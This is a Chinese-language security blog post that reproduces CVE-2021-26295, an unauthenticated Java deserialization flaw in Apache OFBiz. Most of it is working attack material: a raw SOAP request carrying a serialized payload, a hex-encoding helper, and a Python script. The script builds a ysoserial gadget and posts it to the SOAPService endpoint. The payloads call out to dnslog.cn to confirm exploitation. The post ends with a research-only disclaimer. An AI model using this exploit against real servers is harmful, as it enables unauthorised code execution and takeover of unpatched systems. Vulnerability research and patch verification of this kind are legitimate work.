Apache OFBiz rmi反序列化(CVE-2021-26295)复现


 
Apache OFBiz rmi反序列化(CVE-2021-26295)复现
一、漏洞描述
Apache OFBiz存在RMI反序列化前台命令执行,未经身份验证攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
 
二、影响范围
Apache OFBiz:<17.12.06
 
三、环境搭建&漏洞复现
docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz
拉取镜像
漏洞复现:
 
encode脚本:

import binascii
filename = 'thelostworld.ot'
with open(filename, 'rb') as f:
   content = f.read()
print(binascii.hexlify(content))
POC:

POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.0.115:8443
Content-Type: application/xml
Content-Length: 831
​
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header/>
    <soapenv:Body>
    <ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>aced00057372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00014c0004686f737471007e00014c000870726f746f636f6c71007e00014c000372656671007e00017870ffffffffffffffff7400177478663737372e7234343976762e646e736c6f672e636e74000071007e0003740004687474707078</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="http://noxj3z.dnslog.cn"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
    </ser>
    </soapenv:Body>
    </soapenv:Envelope>

  

python3 OFBizPoc.py "https://192.168.0.115:8443/" "http://68zfh0.dnslog.cn"
 
脚本:Powered by 0x141 Team ShimizuKawasaki
import requests
import sys
import subprocess
from urllib3.exceptions import InsecureRequestWarning
​
​
def trans(s):
    return "%s" % ''.join('%.2x' % x for x in s)
​
if __name__ == '__main__':
  print('''
​
=========================================
  ____  ______ ____  _       _____   ____   _____ 
 / __ \|  ____|  _ \(_)     |  __ \ / __ \ / ____|
| |  | | |__  | |_) |_ ____ | |__) | |  | | |     
| |  | |  __| |  _ <| |_  / |  ___/| |  | | |     
| |__| | |    | |_) | |/ /  | |    | |__| | |____ 
 \____/|_|    |____/|_/___| |_|     \____/ \_____|
                                                           
    Powered by 0x141 Team ShimizuKawasaki
=========================================
​
    '''
)
  host = sys.argv[1]
  comForKey = sys.argv[2]
  popen = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", comForKey], stdout=subprocess.PIPE)
  data = popen.stdout.read()
  if len(data) == 0:
    print("请在当前脚本目录放置ysoserial.jar!")
  else :
    hex_data = trans(data)
    headers = {'Content-Type': 'text/xml'}
    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/"><ns1:cus-obj>%s</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)
    if  res.status_code == 200 :
      print("已经测试完成,请检查你的dnslog: " + comForKey)

  


 
参考:
 
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
 
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
 
 
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
 
posted @ 2021-03-25 13:46  thelostworld  阅读(401)  评论(0编辑  收藏  举报